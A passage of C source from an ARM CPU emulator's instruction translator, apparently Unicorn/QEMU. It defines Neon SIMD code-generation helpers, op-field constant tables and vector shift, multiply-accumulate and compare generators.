CPU_V001); break; case 1: gen_helper_neon_subl_u32(tcg_ctx, CPU_V001); break; case 2: tcg_gen_sub_i64(tcg_ctx, CPU_V001); break; default: abort(); } } static inline void gen_neon_negl(TCGContext *tcg_ctx, TCGv_i64 var, int size) { switch (size) { case 0: gen_helper_neon_negl_u16(tcg_ctx, var, var); break; case 1: gen_helper_neon_negl_u32(tcg_ctx, var, var); break; case 2: tcg_gen_neg_i64(tcg_ctx, var, var); break; default: abort(); } } static inline void gen_neon_addl_saturate(TCGContext *tcg_ctx, TCGv_i64 op0, TCGv_i64 op1, int size) { switch (size) { case 1: gen_helper_neon_addl_saturate_s32(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; case 2: gen_helper_neon_addl_saturate_s64(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; default: abort(); } } static inline void gen_neon_mull(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 a, TCGv_i32 b, int size, int u) { TCGv_i64 tmp; switch ((size << 1) | u) { case 0: gen_helper_neon_mull_s8(tcg_ctx, dest, a, b); break; case 1: gen_helper_neon_mull_u8(tcg_ctx, dest, a, b); break; case 2: gen_helper_neon_mull_s16(tcg_ctx, dest, a, b); break; case 3: gen_helper_neon_mull_u16(tcg_ctx, dest, a, b); break; case 4: tmp = gen_muls_i64_i32(tcg_ctx, a, b); tcg_gen_mov_i64(tcg_ctx, dest, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; case 5: tmp = gen_mulu_i64_i32(tcg_ctx, a, b); tcg_gen_mov_i64(tcg_ctx, dest, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; default: abort(); } /* gen_helper_neon_mull_[su]{8|16} do not free their parameters. Don't forget to clean them now. */ if (size < 2) { tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); } } static void gen_neon_narrow_op(TCGContext *tcg_ctx, int op, int u, int size, TCGv_i32 dest, TCGv_i64 src) { if (op) { if (u) { gen_neon_unarrow_sats(tcg_ctx, size, dest, src); } else { gen_neon_narrow(tcg_ctx, size, dest, src); } } else { if (u) { gen_neon_narrow_satu(tcg_ctx, size, dest, src); } else { gen_neon_narrow_sats(tcg_ctx, size, dest, src); } } } /* Symbolic constants for op fields for Neon 3-register same-length. * The values correspond to bits [11:8,4]; see the ARM ARM DDI0406B * table A7-9. */ #define NEON_3R_VHADD 0 #define NEON_3R_VQADD 1 #define NEON_3R_VRHADD 2 #define NEON_3R_LOGIC 3 /* VAND,VBIC,VORR,VMOV,VORN,VEOR,VBIF,VBIT,VBSL */ #define NEON_3R_VHSUB 4 #define NEON_3R_VQSUB 5 #define NEON_3R_VCGT 6 #define NEON_3R_VCGE 7 #define NEON_3R_VSHL 8 #define NEON_3R_VQSHL 9 #define NEON_3R_VRSHL 10 #define NEON_3R_VQRSHL 11 #define NEON_3R_VMAX 12 #define NEON_3R_VMIN 13 #define NEON_3R_VABD 14 #define NEON_3R_VABA 15 #define NEON_3R_VADD_VSUB 16 #define NEON_3R_VTST_VCEQ 17 #define NEON_3R_VML 18 /* VMLA, VMLS */ #define NEON_3R_VMUL 19 #define NEON_3R_VPMAX 20 #define NEON_3R_VPMIN 21 #define NEON_3R_VQDMULH_VQRDMULH 22 #define NEON_3R_VPADD_VQRDMLAH 23 #define NEON_3R_SHA 24 /* SHA1C,SHA1P,SHA1M,SHA1SU0,SHA256H{2},SHA256SU1 */ #define NEON_3R_VFM_VQRDMLSH 25 /* VFMA, VFMS, VQRDMLSH */ #define NEON_3R_FLOAT_ARITH 26 /* float VADD, VSUB, VPADD, VABD */ #define NEON_3R_FLOAT_MULTIPLY 27 /* float VMLA, VMLS, VMUL */ #define NEON_3R_FLOAT_CMP 28 /* float VCEQ, VCGE, VCGT */ #define NEON_3R_FLOAT_ACMP 29 /* float VACGE, VACGT, VACLE, VACLT */ #define NEON_3R_FLOAT_MINMAX 30 /* float VMIN, VMAX */ #define NEON_3R_FLOAT_MISC 31 /* float VRECPS, VRSQRTS, VMAXNM/MINNM */ static const uint8_t neon_3r_sizes[] = { [NEON_3R_VHADD] = 0x7, [NEON_3R_VQADD] = 0xf, [NEON_3R_VRHADD] = 0x7, [NEON_3R_LOGIC] = 0xf, /* size field encodes op type */ [NEON_3R_VHSUB] = 0x7, [NEON_3R_VQSUB] = 0xf, [NEON_3R_VCGT] = 0x7, [NEON_3R_VCGE] = 0x7, [NEON_3R_VSHL] = 0xf, [NEON_3R_VQSHL] = 0xf, [NEON_3R_VRSHL] = 0xf, [NEON_3R_VQRSHL] = 0xf, [NEON_3R_VMAX] = 0x7, [NEON_3R_VMIN] = 0x7, [NEON_3R_VABD] = 0x7, [NEON_3R_VABA] = 0x7, [NEON_3R_VADD_VSUB] = 0xf, [NEON_3R_VTST_VCEQ] = 0x7, [NEON_3R_VML] = 0x7, [NEON_3R_VMUL] = 0x7, [NEON_3R_VPMAX] = 0x7, [NEON_3R_VPMIN] = 0x7, [NEON_3R_VQDMULH_VQRDMULH] = 0x6, [NEON_3R_VPADD_VQRDMLAH] = 0x7, [NEON_3R_SHA] = 0xf, /* size field encodes op type */ [NEON_3R_VFM_VQRDMLSH] = 0x7, /* For VFM, size bit 1 encodes op */ [NEON_3R_FLOAT_ARITH] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MULTIPLY] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_CMP] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_ACMP] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MINMAX] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MISC] = 0x5, /* size bit 1 encodes op */ }; /* Symbolic constants for op fields for Neon 2-register miscellaneous. * The values correspond to bits [17:16,10:7]; see the ARM ARM DDI0406B * table A7-13. */ #define NEON_2RM_VREV64 0 #define NEON_2RM_VREV32 1 #define NEON_2RM_VREV16 2 #define NEON_2RM_VPADDL 4 #define NEON_2RM_VPADDL_U 5 #define NEON_2RM_AESE 6 /* Includes AESD */ #define NEON_2RM_AESMC 7 /* Includes AESIMC */ #define NEON_2RM_VCLS 8 #define NEON_2RM_VCLZ 9 #define NEON_2RM_VCNT 10 #define NEON_2RM_VMVN 11 #define NEON_2RM_VPADAL 12 #define NEON_2RM_VPADAL_U 13 #define NEON_2RM_VQABS 14 #define NEON_2RM_VQNEG 15 #define NEON_2RM_VCGT0 16 #define NEON_2RM_VCGE0 17 #define NEON_2RM_VCEQ0 18 #define NEON_2RM_VCLE0 19 #define NEON_2RM_VCLT0 20 #define NEON_2RM_SHA1H 21 #define NEON_2RM_VABS 22 #define NEON_2RM_VNEG 23 #define NEON_2RM_VCGT0_F 24 #define NEON_2RM_VCGE0_F 25 #define NEON_2RM_VCEQ0_F 26 #define NEON_2RM_VCLE0_F 27 #define NEON_2RM_VCLT0_F 28 #define NEON_2RM_VABS_F 30 #define NEON_2RM_VNEG_F 31 #define NEON_2RM_VSWP 32 #define NEON_2RM_VTRN 33 #define NEON_2RM_VUZP 34 #define NEON_2RM_VZIP 35 #define NEON_2RM_VMOVN 36 /* Includes VQMOVN, VQMOVUN */ #define NEON_2RM_VQMOVN 37 /* Includes VQMOVUN */ #define NEON_2RM_VSHLL 38 #define NEON_2RM_SHA1SU1 39 /* Includes SHA256SU0 */ #define NEON_2RM_VRINTN 40 #define NEON_2RM_VRINTX 41 #define NEON_2RM_VRINTA 42 #define NEON_2RM_VRINTZ 43 #define NEON_2RM_VCVT_F16_F32 44 #define NEON_2RM_VRINTM 45 #define NEON_2RM_VCVT_F32_F16 46 #define NEON_2RM_VRINTP 47 #define NEON_2RM_VCVTAU 48 #define NEON_2RM_VCVTAS 49 #define NEON_2RM_VCVTNU 50 #define NEON_2RM_VCVTNS 51 #define NEON_2RM_VCVTPU 52 #define NEON_2RM_VCVTPS 53 #define NEON_2RM_VCVTMU 54 #define NEON_2RM_VCVTMS 55 #define NEON_2RM_VRECPE 56 #define NEON_2RM_VRSQRTE 57 #define NEON_2RM_VRECPE_F 58 #define NEON_2RM_VRSQRTE_F 59 #define NEON_2RM_VCVT_FS 60 #define NEON_2RM_VCVT_FU 61 #define NEON_2RM_VCVT_SF 62 #define NEON_2RM_VCVT_UF 63 static bool neon_2rm_is_v8_op(int op) { /* Return true if this neon 2reg-misc op is ARMv8 and up */ switch (op) { case NEON_2RM_VRINTN: case NEON_2RM_VRINTA: case NEON_2RM_VRINTM: case NEON_2RM_VRINTP: case NEON_2RM_VRINTZ: case NEON_2RM_VRINTX: case NEON_2RM_VCVTAU: case NEON_2RM_VCVTAS: case NEON_2RM_VCVTNU: case NEON_2RM_VCVTNS: case NEON_2RM_VCVTPU: case NEON_2RM_VCVTPS: case NEON_2RM_VCVTMU: case NEON_2RM_VCVTMS: return true; default: return false; } } /* Each entry in this array has bit n set if the insn allows * size value n (otherwise it will UNDEF). Since unallocated * op values will have no bits set they always UNDEF. */ static const uint8_t neon_2rm_sizes[] = { [NEON_2RM_VREV64] = 0x7, [NEON_2RM_VREV32] = 0x3, [NEON_2RM_VREV16] = 0x1, [NEON_2RM_VPADDL] = 0x7, [NEON_2RM_VPADDL_U] = 0x7, [NEON_2RM_AESE] = 0x1, [NEON_2RM_AESMC] = 0x1, [NEON_2RM_VCLS] = 0x7, [NEON_2RM_VCLZ] = 0x7, [NEON_2RM_VCNT] = 0x1, [NEON_2RM_VMVN] = 0x1, [NEON_2RM_VPADAL] = 0x7, [NEON_2RM_VPADAL_U] = 0x7, [NEON_2RM_VQABS] = 0x7, [NEON_2RM_VQNEG] = 0x7, [NEON_2RM_VCGT0] = 0x7, [NEON_2RM_VCGE0] = 0x7, [NEON_2RM_VCEQ0] = 0x7, [NEON_2RM_VCLE0] = 0x7, [NEON_2RM_VCLT0] = 0x7, [NEON_2RM_SHA1H] = 0x4, [NEON_2RM_VABS] = 0x7, [NEON_2RM_VNEG] = 0x7, [NEON_2RM_VCGT0_F] = 0x4, [NEON_2RM_VCGE0_F] = 0x4, [NEON_2RM_VCEQ0_F] = 0x4, [NEON_2RM_VCLE0_F] = 0x4, [NEON_2RM_VCLT0_F] = 0x4, [NEON_2RM_VABS_F] = 0x4, [NEON_2RM_VNEG_F] = 0x4, [NEON_2RM_VSWP] = 0x1, [NEON_2RM_VTRN] = 0x7, [NEON_2RM_VUZP] = 0x7, [NEON_2RM_VZIP] = 0x7, [NEON_2RM_VMOVN] = 0x7, [NEON_2RM_VQMOVN] = 0x7, [NEON_2RM_VSHLL] = 0x7, [NEON_2RM_SHA1SU1] = 0x4, [NEON_2RM_VRINTN] = 0x4, [NEON_2RM_VRINTX] = 0x4, [NEON_2RM_VRINTA] = 0x4, [NEON_2RM_VRINTZ] = 0x4, [NEON_2RM_VCVT_F16_F32] = 0x2, [NEON_2RM_VRINTM] = 0x4, [NEON_2RM_VCVT_F32_F16] = 0x2, [NEON_2RM_VRINTP] = 0x4, [NEON_2RM_VCVTAU] = 0x4, [NEON_2RM_VCVTAS] = 0x4, [NEON_2RM_VCVTNU] = 0x4, [NEON_2RM_VCVTNS] = 0x4, [NEON_2RM_VCVTPU] = 0x4, [NEON_2RM_VCVTPS] = 0x4, [NEON_2RM_VCVTMU] = 0x4, [NEON_2RM_VCVTMS] = 0x4, [NEON_2RM_VRECPE] = 0x4, [NEON_2RM_VRSQRTE] = 0x4, [NEON_2RM_VRECPE_F] = 0x4, [NEON_2RM_VRSQRTE_F] = 0x4, [NEON_2RM_VCVT_FS] = 0x4, [NEON_2RM_VCVT_FU] = 0x4, [NEON_2RM_VCVT_SF] = 0x4, [NEON_2RM_VCVT_UF] = 0x4, }; /* Expand v8.1 simd helper. */ static int do_v81_helper(DisasContext *s, gen_helper_gvec_3_ptr *fn, int q, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (dc_isar_feature(aa32_rdm, s)) { int opr_sz = (1 + q) * 8; tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), vfp_reg_offset(1, rn), vfp_reg_offset(1, rm), tcg_ctx->cpu_env, opr_sz, opr_sz, 0, fn); return 0; } return 1; } static void gen_ssra8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_sar8i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add8_i64(tcg_ctx, d, d, a); } static void gen_ssra16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_sar16i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add16_i64(tcg_ctx, d, d, a); } static void gen_ssra32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_sari_i32(tcg_ctx, a, a, shift); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_ssra64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_sari_i64(tcg_ctx, a, a, shift); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_ssra_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { tcg_gen_sari_vec(tcg_ctx, vece, a, a, sh); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static const TCGOpcode vecop_list_ssra[] = { INDEX_op_sari_vec, INDEX_op_add_vec, 0 }; const GVecGen2i ssra_op[4] = { { .fni8 = gen_ssra8_i64, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_8 }, { .fni8 = gen_ssra16_i64, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_16 }, { .fni4 = gen_ssra32_i32, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_32 }, { .fni8 = gen_ssra64_i64, .fniv = gen_ssra_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .opt_opc = vecop_list_ssra, .load_dest = true, .vece = MO_64 }, }; static void gen_usra8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_shr8i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add8_i64(tcg_ctx, d, d, a); } static void gen_usra16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_shr16i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add16_i64(tcg_ctx, d, d, a); } static void gen_usra32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_shri_i32(tcg_ctx, a, a, shift); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_usra64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_shri_i64(tcg_ctx, a, a, shift); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_usra_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { tcg_gen_shri_vec(tcg_ctx, vece, a, a, sh); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static const TCGOpcode vecop_list_usra[] = { INDEX_op_shri_vec, INDEX_op_add_vec, 0 }; const GVecGen2i usra_op[4] = { { .fni8 = gen_usra8_i64, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_8, }, { .fni8 = gen_usra16_i64, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_16, }, { .fni4 = gen_usra32_i32, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_32, }, { .fni8 = gen_usra64_i64, .fniv = gen_usra_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_64, }, }; static void gen_shr8_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_8, 0xff >> shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shr16_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_16, 0xffff >> shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shr32_ins_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_shri_i32(tcg_ctx, a, a, shift); tcg_gen_deposit_i32(tcg_ctx, d, d, a, 0, 32 - shift); } static void gen_shr64_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_shri_i64(tcg_ctx, a, a, shift); tcg_gen_deposit_i64(tcg_ctx, d, d, a, 0, 64 - shift); } static void gen_shr_ins_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { if (sh == 0) { tcg_gen_mov_vec(tcg_ctx, d, a); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); TCGv_vec m = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, m, MAKE_64BIT_MASK((8 << vece) - sh, sh)); tcg_gen_shri_vec(tcg_ctx, vece, t, a, sh); tcg_gen_and_vec(tcg_ctx, vece, d, d, m); tcg_gen_or_vec(tcg_ctx, vece, d, d, t); tcg_temp_free_vec(tcg_ctx, t); tcg_temp_free_vec(tcg_ctx, m); } } static const TCGOpcode vecop_list_sri[] = { INDEX_op_shri_vec, 0 }; const GVecGen2i sri_op[4] = { { .fni8 = gen_shr8_ins_i64, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_8 }, { .fni8 = gen_shr16_ins_i64, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_16 }, { .fni4 = gen_shr32_ins_i32, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_32 }, { .fni8 = gen_shr64_ins_i64, .fniv = gen_shr_ins_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_64 }, }; static void gen_shl8_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_8, 0xff << shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shl16_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_16, 0xffff << shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shl32_ins_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_deposit_i32(tcg_ctx, d, d, a, shift, 32 - shift); } static void gen_shl64_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_deposit_i64(tcg_ctx, d, d, a, shift, 64 - shift); } static void gen_shl_ins_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { if (sh == 0) { tcg_gen_mov_vec(tcg_ctx, d, a); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); TCGv_vec m = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, m, MAKE_64BIT_MASK(0, sh)); tcg_gen_shli_vec(tcg_ctx, vece, t, a, sh); tcg_gen_and_vec(tcg_ctx, vece, d, d, m); tcg_gen_or_vec(tcg_ctx, vece, d, d, t); tcg_temp_free_vec(tcg_ctx, t); tcg_temp_free_vec(tcg_ctx, m); } } static const TCGOpcode vecop_list_sli[] = { INDEX_op_shli_vec, 0 }; const GVecGen2i sli_op[4] = { { .fni8 = gen_shl8_ins_i64, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_8 }, { .fni8 = gen_shl16_ins_i64, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_16 }, { .fni4 = gen_shl32_ins_i32, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_32 }, { .fni8 = gen_shl64_ins_i64, .fniv = gen_shl_ins_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_64 }, }; static void gen_mla8_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u8(tcg_ctx, a, a, b); gen_helper_neon_add_u8(tcg_ctx, d, d, a); } static void gen_mls8_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u8(tcg_ctx, a, a, b); gen_helper_neon_sub_u8(tcg_ctx, d, d, a); } static void gen_mla16_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u16(tcg_ctx, a, a, b); gen_helper_neon_add_u16(tcg_ctx, d, d, a); } static void gen_mls16_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u16(tcg_ctx, a, a, b); gen_helper_neon_sub_u16(tcg_ctx, d, d, a); } static void gen_mla32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mul_i32(tcg_ctx, a, a, b); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_mls32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mul_i32(tcg_ctx, a, a, b); tcg_gen_sub_i32(tcg_ctx, d, d, a); } static void gen_mla64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mul_i64(tcg_ctx, a, a, b); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_mls64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mul_i64(tcg_ctx, a, a, b); tcg_gen_sub_i64(tcg_ctx, d, d, a); } static void gen_mla_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_mul_vec(tcg_ctx, vece, a, a, b); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static void gen_mls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_mul_vec(tcg_ctx, vece, a, a, b); tcg_gen_sub_vec(tcg_ctx, vece, d, d, a); } /* Note that while NEON does not support VMLA and VMLS as 64-bit ops, * these tables are shared with AArch64 which does support them. */ static const TCGOpcode vecop_list_mla[] = { INDEX_op_mul_vec, INDEX_op_add_vec, 0 }; static const TCGOpcode vecop_list_mls[] = { INDEX_op_mul_vec, INDEX_op_sub_vec, 0 }; const GVecGen3 mla_op[4] = { { .fni4 = gen_mla8_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_8 }, { .fni4 = gen_mla16_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_16 }, { .fni4 = gen_mla32_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_32 }, { .fni8 = gen_mla64_i64, .fniv = gen_mla_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_64 }, }; const GVecGen3 mls_op[4] = { { .fni4 = gen_mls8_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_8 }, { .fni4 = gen_mls16_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_16 }, { .fni4 = gen_mls32_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_32 }, { .fni8 = gen_mls64_i64, .fniv = gen_mls_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_64 }, }; /* CMTST : test is "if (X & Y != 0)". */ static void gen_cmtst_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_and_i32(tcg_ctx, d, a, b); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_NE, d, d, 0); tcg_gen_neg_i32(tcg_ctx, d, d); } void gen_cmtst_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_and_i64(tcg_ctx, d, a, b); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, d, d, 0); tcg_gen_neg_i64(tcg_ctx, d, d); } static void gen_cmtst_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_and_vec(tcg_ctx, vece, d, a, b); tcg_gen_dupi_vec(tcg_ctx, vece, a, 0); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, d, d, a); } static const TCGOpcode vecop_list_cmtst[] = { INDEX_op_cmp_vec, 0 }; const GVecGen3 cmtst_op[4] = { { .fni4 = gen_helper_neon_tst_u8, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_8 }, { .fni4 = gen_helper_neon_tst_u16, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_16 }, { .fni4 = gen_cmtst_i32, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_32 }, { .fni8 = gen_cmtst_i64, .fniv = gen_cmtst_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .opt_opc = vecop_list_cmtst, .vece = MO_64 }, }; void gen_ushl_i32(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 src, TCGv_i32 shift) { TCGv_i32 lval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 lsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 max = tcg_const_i32(tcg_ctx, 32); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i32(tcg_ctx, lsh, shift); tcg_gen_neg_i32(tcg_ctx, rsh, lsh); tcg_gen_shl_i32(tcg_ctx, lval, src, lsh); tcg_gen_shr_i32(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, dst, lsh, max, lval, zero); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, dst, rsh, max, rval, dst); tcg_temp_free_i32(tcg_ctx, lval); tcg_temp_free_i32(tcg_ctx, rval); tcg_temp_free_i32(tcg_ctx, lsh); tcg_temp_free_i32(tcg_ctx, rsh); tcg_temp_free_i32(tcg_ctx, zero); tcg_temp_free_i32(tcg_ctx, max); } void gen_ushl_i64(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, TCGv_i64 shift) { TCGv_i64 lval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 max = tcg_const_i64(tcg_ctx, 64); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i64(tcg_ctx, lsh, shift); tcg_gen_neg_i64(tcg_ctx, rsh, lsh); tcg_gen_shl_i64(tcg_ctx, lval, src, lsh); tcg_gen_shr_i64(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, dst, lsh, max, lval, zero); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, dst, rsh, max, rval, dst); tcg_temp_free_i64(tcg_ctx, lval); tcg_temp_free_i64(tcg_ctx, rval); tcg_temp_free_i64(tcg_ctx, lsh); tcg_temp_free_i64(tcg_ctx, rsh); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, max); } static void 